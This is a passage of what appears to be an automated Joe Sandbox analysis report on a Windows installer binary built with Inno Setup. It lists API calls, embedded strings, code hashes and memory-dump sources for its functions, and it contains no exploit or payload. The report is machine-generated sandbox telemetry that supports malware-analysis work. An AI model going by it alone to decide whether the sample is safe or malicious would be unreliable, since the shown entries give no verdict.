• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: FindSleepWindow
• String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
• API String ID: 3078808852-3310373309
• Opcode ID: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
• Instruction ID: f524c342f64002353724253178373006bfdacafd8b11f716a45f6a977dbd9a74
• Opcode Fuzzy Hash: 00e72b43fdd863d5ba5dcc0766ec439f54cea458937b4516d34acaa2a5549163
• Instruction Fuzzy Hash: 70C18560B0061027D714FB7E9C8261E66999F95704B11DD3FB446EB78ACE3DEC05836E
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (entry block at 47dc90; graph rendering not reproduced in text)
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0047DCA1
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0047DCAE
• GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DCBC
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0047DCC4
• GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0047DCD0
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0047DCF1
• GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 0047DD04
• GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0047DD0A
• GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0047DD21
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
• String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
• API String ID: 2230631259-2623177817
• Opcode ID: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
• Instruction ID: 9223080a01aab665d55f2b56f17608545a072cc335287f1292a6e5765a842dfc
• Opcode Fuzzy Hash: cd7d2839bf33e36d33ab18a2ace6ff88ba8499abbd063b6382b2a6e7979d4eda
• Instruction Fuzzy Hash: AD11E241C2574094EA31B7B58E4ABFB2678CF12758F18C43B784C662C3D67CD8448A6F
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (entry block at 4651a8; graph rendering not reproduced in text)
APIs
  • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
• RegCloseKey.ADVAPI32(?,004653C2,?,?,00000001,00000000,00000000,004653DD,?,00000000,00000000,?), ref: 004653AB
Strings
• Inno Setup: No Icons, xrefs: 00465293
• %s\%s_is1, xrefs: 00465225
• Inno Setup: Deselected Tasks, xrefs: 00465339
• Inno Setup: Selected Tasks, xrefs: 00465317
• Inno Setup: Deselected Components, xrefs: 004652EC
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00465207
• Inno Setup: User Info: Name, xrefs: 00465367
• Inno Setup: User Info: Organization, xrefs: 0046537A
• Inno Setup: App Path, xrefs: 0046526A
• Inno Setup: Icon Group, xrefs: 00465286
• Inno Setup: Setup Type, xrefs: 004652BA
• Inno Setup: Selected Components, xrefs: 004652CA
• Inno Setup: User Info: Serial, xrefs: 0046538D
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1093091907
• Opcode ID: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
• Instruction ID: 4ab213a2d8ea7f563b4f24483654b6d3db0bb1d5b93a3c7cd1a46aaae94220a2
• Opcode Fuzzy Hash: 9ce9a5df1975e756b432f281553e90eeeeefc017c1f178ede9342908355fa115
• Instruction Fuzzy Hash: 5251D630A00A449BCB11DB65D9517DEBBF5EF44344FA084BAE844A7392E778AF45CB09
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (entry block at 4237e4; graph rendering not reproduced in text)
APIs
  • Part of subcall function 0041F334: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041ED14,?,004237FF,00423B7C,0041ED14), ref: 0041F352
• GetClassInfoA.USER32(00400000,004235EC), ref: 0042380F
• RegisterClassA.USER32(00493630), ref: 00423827
• GetSystemMetrics.USER32(00000000), ref: 00423849
• GetSystemMetrics.USER32(00000001), ref: 00423858
• SetWindowLongA.USER32(004105C0,000000FC,004235FC), ref: 004238B4
• SendMessageA.USER32(004105C0,00000080,00000001,00000000), ref: 004238D5
• GetSystemMenu.USER32(004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238E0
• DeleteMenu.USER32(00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423B7C,0041ED14), ref: 004238EF
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 004238FC
• DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,004105C0,00000000,00000000,00400000,00000000,00000000,00000000), ref: 00423912
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                            • String ID: 5B
                                                                            • API String ID: 183575631-3738334870
                                                                            • Opcode ID: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                            • Instruction ID: 904541913dac979c95981ef11fb7d46e22315ee65c5a1a9273e4e0c77d2e9a1f
                                                                            • Opcode Fuzzy Hash: 2525fb3c05810e8562c46c69867c8ead6d06b13db06e753dcd3e83bb75084637
                                                                            • Instruction Fuzzy Hash: 073161B17402107AEB20AF65DC82F6B36989715709F10017BBA41AF2D7C67DED01876C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 1855 4779b4-477a0a call 42c36c call 4035c0 call 477630 call 450f5c 1864 477a16-477a25 call 450f5c 1855->1864 1865 477a0c-477a11 call 451cc8 1855->1865 1869 477a27-477a2d 1864->1869 1870 477a3f-477a45 1864->1870 1865->1864 1871 477a4f-477a57 call 403494 1869->1871 1872 477a2f-477a35 1869->1872 1873 477a47-477a4d 1870->1873 1874 477a5c-477a84 call 42e1f0 * 2 1870->1874 1871->1874 1872->1870 1876 477a37-477a3d 1872->1876 1873->1871 1873->1874 1881 477a86-477aa6 call 40785c call 451cc8 1874->1881 1882 477aab-477ac5 GetProcAddress 1874->1882 1876->1870 1876->1871 1881->1882 1884 477ac7-477acc call 451cc8 1882->1884 1885 477ad1-477aee call 403400 * 2 1882->1885 1884->1885
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(6E570000,SHGetFolderPathA), ref: 00477AB6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                            • API String ID: 190572456-1343262939
                                                                            • Opcode ID: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                            • Instruction ID: 49185784d2d2767166d0e9f92b0e194c902f92e05003c5a198be5f154938151e
                                                                            • Opcode Fuzzy Hash: 326d038cb5ed66d6965ef9f79b3615df5c39ec0eed82ce05998c1027af74040e
                                                                            • Instruction Fuzzy Hash: 2D310030A042099FDB11EB95D8829DEB7B5EB44308FA08577E804E7351D778AF45CBAC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 1893 42ed94-42ed9e 1894 42eda0-42eda3 call 402d30 1893->1894 1895 42eda8-42ede5 call 402b30 GetActiveWindow GetFocus call 41ee14 1893->1895 1894->1895 1901 42edf7-42edff 1895->1901 1902 42ede7-42edf1 RegisterClassA 1895->1902 1903 42ee86-42eea2 SetFocus call 403400 1901->1903 1904 42ee05-42ee36 CreateWindowExA 1901->1904 1902->1901 1904->1903 1906 42ee38-42ee7c call 4241ec call 403738 CreateWindowExA 1904->1906 1906->1903 1912 42ee7e-42ee81 ShowWindow 1906->1912 1912->1903
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042EDC3
                                                                            • GetFocus.USER32 ref: 0042EDCB
                                                                            • RegisterClassA.USER32(004937AC), ref: 0042EDEC
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042EEC0,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042EE2A
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042EE70
                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042EE81
                                                                            • SetFocus.USER32(00000000,00000000,0042EEA3,?,?,?,00000001,00000000,?,00456712,00000000,00494628), ref: 0042EE88
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                            • String ID: (FI$TWindowDisabler-Window
                                                                            • API String ID: 3167913817-373594729
                                                                            • Opcode ID: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                            • Instruction ID: da0a8043275c7bf3a93fe4eefa1d540893f351b9f71510032f8cfd414f1a65c9
                                                                            • Opcode Fuzzy Hash: a3ca60a75e732bb51453dddc2c490802b9d7a662ac09df4b556055ac6f1e94aa
                                                                            • Instruction Fuzzy Hash: 6721B2B1740711BAE220EF62DC02F1B76A8EB45B04F61413BF600AB2D1D7BC6D11C6AD
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            control_flow_graph 1913 451b74-451bc5 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 1914 451bc7-451bce 1913->1914 1915 451bd0-451bd2 1913->1915 1914->1915 1916 451bd4 1914->1916 1917 451bd6-451c0c call 42e1f0 call 42e670 call 403400 1915->1917 1916->1917
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451B94
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451B9A
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00451C0D,?,?,?,?,00000000,?,0049297B), ref: 00451BAE
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00451BB4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                            • Instruction ID: 997ed90857de5ca6b6faab55f770a1a30dabd985267bea0a56e7b9690acb7eff
                                                                            • Opcode Fuzzy Hash: f383fb48213f6c2b98df67bb585b7a3e2d1d6244cf436abb077e6f35d80479e6
                                                                            • Instruction Fuzzy Hash: 4201D474284304AEDB02EB72EC06F5B3A58F751B1AF60487BF800562A3D6FD5D09CA2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 0047771B
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,004777FB,?,?,00000000,00494628,00000000,00000000,?,00492351,00000000,004924FA,?,00000000), ref: 00477724
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                            • API String ID: 1375471231-1421604804
                                                                            • Opcode ID: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                            • Instruction ID: 4b0667b2ca952db17e5eb31d7eb45e66b75ce74adbb243fdaac5edde39bfd4c6
                                                                            • Opcode Fuzzy Hash: 9af9e5047942150dd1bdaf748b612ec8dc7c41cda999b56e55422ae8274150d3
                                                                            • Instruction Fuzzy Hash: B3415634A002099BCB01FF95C891ADEB7B5FB44304F50857BE81477396D738AE05CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            APIs
                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 0043017C
                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0043018B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 004301A5
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 004301C6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                            • API String ID: 4130936913-2943970505
                                                                            • Opcode ID: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                            • Instruction ID: 40284a23f2128dd4c732f76bf629692f59332b695a7ba269acd0c8d21ef7b0e1
                                                                            • Opcode Fuzzy Hash: e1a288e5974f646cac8171a9bb8c2e0076bf1e8d900104ca3b2b9541d9e9a9a5
                                                                            • Instruction Fuzzy Hash: ACF082B04483408AD700EB75C802B197BE4EB99318F00467FB858A63E1D77E8501CB5F
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C,00000000), ref: 00453928
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,0045399C,0045399C,00000031,0045399C), ref: 00453935
                                                                              • Part of subcall function 004536EC: WaitForInputIdle.USER32(00000001,00000032), ref: 00453718
                                                                              • Part of subcall function 004536EC: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 0045373A
                                                                              • Part of subcall function 004536EC: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00453749
                                                                              • Part of subcall function 004536EC: CloseHandle.KERNEL32(00000001,00453776,0045376F,?,00000031,00000080,00000000,?,?,00453AC7,00000080,0000003C,00000000,00453ADD), ref: 00453769
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                            • API String ID: 854858120-615399546
                                                                            • Opcode ID: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                            • Instruction ID: 23b7935fd39ab9199875fd3ca17ea8a190fbf679708bf4b94726f8b76bbbb425
                                                                            • Opcode Fuzzy Hash: 3ba6da27587f0247c6075d637dc04b84a3427199ed6966589dcae68aca958c76
                                                                            • Instruction Fuzzy Hash: 385148B470034DABDB11EFA5CC41BDEBBB9AF44746F50443BB804A7282D7799B098B58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
                                                                            • OemToCharA.USER32(?,?), ref: 004236CC
                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                            • String ID: 2$MAINICON
                                                                            • API String ID: 3935243913-3181700818
                                                                            • Opcode ID: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                            • Instruction ID: 369b424dc89666f2ebc4032af242e6aa1f8f3c6487aa9724dd5eac47ff86fd2b
                                                                            • Opcode Fuzzy Hash: 0aa366c20d2d5f249e9f5701ecd4d5d8333df010bd072e77a87ccb3058afe0f7
                                                                            • Instruction Fuzzy Hash: EC31C4B0A042449ADF10EF29C8C57C67BE8AF14308F4440BAE844DB383D7BED989CB65
                                                                            Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcessId.KERNEL32(00000000), ref: 00418EAD
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418ECE
• GetCurrentThreadId.KERNEL32 ref: 00418EE9
• GlobalAddAtomA.KERNEL32(00000000), ref: 00418F0A
  • Part of subcall function 00423038: 73A0A570.USER32(00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 0042308E
  • Part of subcall function 00423038: EnumFontsA.GDI32(00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000,?,?,?,00000001), ref: 004230A1
  • Part of subcall function 00423038: 73A14620.GDI32(00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230A9
  • Part of subcall function 00423038: 73A0A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00422FD8,004105C0,00000000,?,?,00000000,?,00418F43,00000000), ref: 004230B4
  • Part of subcall function 004235FC: LoadIconA.USER32(00400000,MAINICON), ref: 0042368C
  • Part of subcall function 004235FC: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 004236B9
  • Part of subcall function 004235FC: OemToCharA.USER32(?,?), ref: 004236CC
  • Part of subcall function 004235FC: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418F56,00000000,?,?,?,00000001), ref: 0042370C
  • Part of subcall function 0041F088: GetVersion.KERNEL32(?,00418F60,00000000,?,?,?,00000001), ref: 0041F096
  • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0B2
  • Part of subcall function 0041F088: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0BE
  • Part of subcall function 0041F088: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418F60,00000000,?,?,?,00000001), ref: 0041F0CC
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F0FC
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F125
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F13A
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F14F
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F164
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F179
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F18E
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F1A3
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F1B8
  • Part of subcall function 0041F088: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F1CD
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: AddressProc$AtomCharCurrentErrorGlobalLoadMode$A14620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
• String ID: ControlOfs%.8X%.8X$Delphi%.8X
• API String ID: 3476490787-2767913252
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetWindowLongA.USER32(?,000000FC,?), ref: 004135D4
• GetWindowLongA.USER32(?,000000F0), ref: 004135DF
• GetWindowLongA.USER32(?,000000F4), ref: 004135F1
• SetWindowLongA.USER32(?,000000F4,?), ref: 00413604
• SetPropA.USER32(?,00000000,00000000), ref: 0041361B
• SetPropA.USER32(?,00000000,00000000), ref: 00413632
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: LongWindow$Prop
• String ID:
• API String ID: 3887896539-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• FindNextFileA.KERNEL32(000000FF,?,00000000,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DD01
• FindClose.KERNEL32(000000FF,0046DD2C,0046DD25,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DD1F
• FindNextFileA.KERNEL32(000000FF,?,00000000,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE), ref: 0046DE23
• FindClose.KERNEL32(000000FF,0046DE4E,0046DE47,?,00000000,?,00000001,00000000,0046DEF3,?,00000000,?,00000000,?,0046E0AE,?), ref: 0046DE41
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
